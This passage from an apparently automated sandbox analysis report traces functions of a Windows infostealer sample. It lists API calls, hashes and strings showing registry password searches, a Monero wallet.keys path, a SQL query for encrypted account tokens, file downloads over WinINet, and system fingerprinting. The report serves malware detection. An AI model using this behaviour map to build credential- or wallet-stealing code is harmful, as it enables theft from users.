                              APIs
                                • Part of subcall function 00A572D0: memset.MSVCRT ref: 00A57314
                                • Part of subcall function 00A572D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00A5733A
                                • Part of subcall function 00A572D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00A573B1
                                • Part of subcall function 00A572D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00A5740D
                                • Part of subcall function 00A572D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00A57452
                                • Part of subcall function 00A572D0: HeapFree.KERNEL32(00000000), ref: 00A57459
                              • lstrcat.KERNEL32(00000000,00A717FC), ref: 00A57606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00A57648
                              • lstrcat.KERNEL32(00000000, : ), ref: 00A5765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00A5768F
                              • lstrcat.KERNEL32(00000000,00A71804), ref: 00A576A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00A576D3
                              • lstrcat.KERNEL32(00000000,00A71808), ref: 00A576ED
                              • task.LIBCPMTD ref: 00A576FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                              • String ID: :
                              • API String ID: 3191641157-3653984579
                              • Opcode ID: f22756ddcd7ef2357e9be1ef44c3ed87e31d9357dfc00f5e6bc7c5b80dafa966
                              • Instruction ID: 718f84aff2fa403d636775b36f367d31b221518254e193bd3d352f855e2bea51
                              • Opcode Fuzzy Hash: f22756ddcd7ef2357e9be1ef44c3ed87e31d9357dfc00f5e6bc7c5b80dafa966
                              • Instruction Fuzzy Hash: 4B313C71900109EBCB04EBB4DD99FFF7778BB44702B144519F502B72A0DA34A94ACB92
                              Function 00A572D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 00A57314
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00A5733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00A573B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00A5740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00A57452
                              • HeapFree.KERNEL32(00000000), ref: 00A57459
                              • task.LIBCPMTD ref: 00A57555
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuememsettask
                              • String ID: Password
                              • API String ID: 2808661185-3434357891
                              • Opcode ID: 97db1b4211784972d038d94db2aca61b8bb861e77481cf9962b3a74d2f30287e
                              • Instruction ID: 8c25086205e08cde496ad8cf554ac2161e6fe60a5eb356d4ea09f829704410ef
                              • Opcode Fuzzy Hash: 97db1b4211784972d038d94db2aca61b8bb861e77481cf9962b3a74d2f30287e
                              • Instruction Fuzzy Hash: 69613DB59041689BDB24DB50DD45FDEB7B8BF44301F0081E9EA49A6181EB705FC9CFA1
                              Function 00A68100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0144EBB0,00000000,?,00A70E2C,00000000,?,00000000), ref: 00A68130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A68137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00A68158
                              • __aulldiv.LIBCMT ref: 00A68172
                              • __aulldiv.LIBCMT ref: 00A68180
                              • wsprintfA.USER32 ref: 00A681AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: d2e4cb6738e692ec2e1a0e4a1031d2dc39558fe6fd8f2fa7b19951b5fb1e76e1
                              • Instruction ID: 0a8dd7d9e8a461b5d00a4bd120173637b1a33dfcf117cf4b760641079e2e8b24
                              • Opcode Fuzzy Hash: d2e4cb6738e692ec2e1a0e4a1031d2dc39558fe6fd8f2fa7b19951b5fb1e76e1
                              • Instruction Fuzzy Hash: 5A212CB1E44218ABDB00DFD5CD49FAFB7B8FB44B54F104609F615BB280D77869018BA5
                              Function 00A560A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                                • Part of subcall function 00A547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A54839
                                • Part of subcall function 00A547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A54849
                              • InternetOpenA.WININET(00A70DF7,00000001,00000000,00000000,00000000), ref: 00A5610F
                              • StrCmpCA.SHLWAPI(?,0144F340), ref: 00A56147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00A5618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00A561B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 00A561DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00A5620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00A56249
                              • InternetCloseHandle.WININET(?), ref: 00A56253
                              • InternetCloseHandle.WININET(00000000), ref: 00A56260
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 5548177640f3b3ea75f09a6f33b14053341ec0ea3509becae06fb77708c1006a
                              • Instruction ID: b492f912d95dd930fc89b635bf13669c6e450def72273b40d6e4fb58edfd2390
                              • Opcode Fuzzy Hash: 5548177640f3b3ea75f09a6f33b14053341ec0ea3509becae06fb77708c1006a
                              • Instruction Fuzzy Hash: 9C515FB1A00218ABDB20DFA0DD49BEE77B8FB44701F508199BA05A71C1DB746A89CF95
                              Function 00A5BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                              • lstrlen.KERNEL32(00000000), ref: 00A5BC9F
                                • Part of subcall function 00A68E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A68E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 00A5BCCD
                              • lstrlen.KERNEL32(00000000), ref: 00A5BDA5
                              • lstrlen.KERNEL32(00000000), ref: 00A5BDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: c12282f691f03c5e36d890f6e5c629ac7f5ae58d9e843af05bc73c90fc028a36
                              • Instruction ID: f379bbd825541b1af4efe88b89e302c9ea632b03100c0e9f1a86e6c70ea64de2
                              • Opcode Fuzzy Hash: c12282f691f03c5e36d890f6e5c629ac7f5ae58d9e843af05bc73c90fc028a36
                              • Instruction Fuzzy Hash: E7B11C72910108ABDB04FBA4DE96EEE7378BF64301F504569F506B7091EF346A49CFA2
                              Function 00A66770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 5636e12343d0fc11e7d71bbdbe46008945fe6e73d3624690e82d0e644bd790cf
                              • Instruction ID: c7c6567dfeba219074fe6d1a8d8dcac7f6e1d092770560f0735921e66da8ef48
                              • Opcode Fuzzy Hash: 5636e12343d0fc11e7d71bbdbe46008945fe6e73d3624690e82d0e644bd790cf
                              • Instruction Fuzzy Hash: D2F0FE31944219EFD7449FE0E90E76C7B70FB09707F14019AE60986290D6744B61DBD6
                              Function 00A54FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00A54FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A54FD1
                              • InternetOpenA.WININET(00A70DDF,00000000,00000000,00000000,00000000), ref: 00A54FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00A55011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00A55041
                              • InternetCloseHandle.WININET(?), ref: 00A550B9
                              • InternetCloseHandle.WININET(?), ref: 00A550C6
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 53db3a8d8b2f61d20acdeb39cd9a8684fe5a1560da7a019971f2489acea36131
                              • Instruction ID: f0b13b2a4b754630f227f4105cfac2277f2b6e24346bca07bff0549951c6fe50
                              • Opcode Fuzzy Hash: 53db3a8d8b2f61d20acdeb39cd9a8684fe5a1560da7a019971f2489acea36131
                              • Instruction Fuzzy Hash: A031F7B4A40218ABDB20CF94DD89BDDB7B4FB48704F1081D9FA09A7281C7706EC58F99
                              Function 00A683DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00A68426
                              • wsprintfA.USER32 ref: 00A68459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00A6847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 00A6848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00A68499
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                              • RegQueryValueExA.ADVAPI32(00000000,0144EE08,00000000,000F003F,?,00000400), ref: 00A684EC
                              • lstrlen.KERNEL32(?), ref: 00A68501
                              • RegQueryValueExA.ADVAPI32(00000000,0144ED18,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00A70B34), ref: 00A68599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00A68608
                              • RegCloseKey.ADVAPI32(00000000), ref: 00A6861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 39bfafeac7f207cea1000ca08da4288b5fd318e5e91dfd79e495ee789f71a10e
                              • Instruction ID: 81d7621251acef6ad3d2f07e9cc81146f879f7bf8514f99d5c45e9eb8ee1a27f
                              • Opcode Fuzzy Hash: 39bfafeac7f207cea1000ca08da4288b5fd318e5e91dfd79e495ee789f71a10e
                              • Instruction Fuzzy Hash: 8F21E971A10218AFDB24DB54DC89FE9B3B8FB48700F00C5D9E609A6180DF756A85CFD4
                              Function 00A67690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A676A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A676AB
                              • RegOpenKeyExA.ADVAPI32(80000002,0143B980,00000000,00020119,00000000), ref: 00A676DD
                              • RegQueryValueExA.ADVAPI32(00000000,0144ED60,00000000,00000000,?,000000FF), ref: 00A676FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00A67708
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: a3c6352f6111910db44b9237827755b35506f0d8fec8a47fcd523bed4093e59a
                              • Instruction ID: 12360b1508691f3cc795aadb373bee17243cbcb5ea256e610ca6de7b134ee92d
                              • Opcode Fuzzy Hash: a3c6352f6111910db44b9237827755b35506f0d8fec8a47fcd523bed4093e59a
                              • Instruction Fuzzy Hash: F40162B5A04204FBDB00DBE4DD4EF6DB7B8EB48705F108455FA04D72D1E67099008B95
                              Function 00A67720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A67734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A6773B
                              • RegOpenKeyExA.ADVAPI32(80000002,0143B980,00000000,00020119,00A676B9), ref: 00A6775B
                              • RegQueryValueExA.ADVAPI32(00A676B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00A6777A
                              • RegCloseKey.ADVAPI32(00A676B9), ref: 00A67784
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
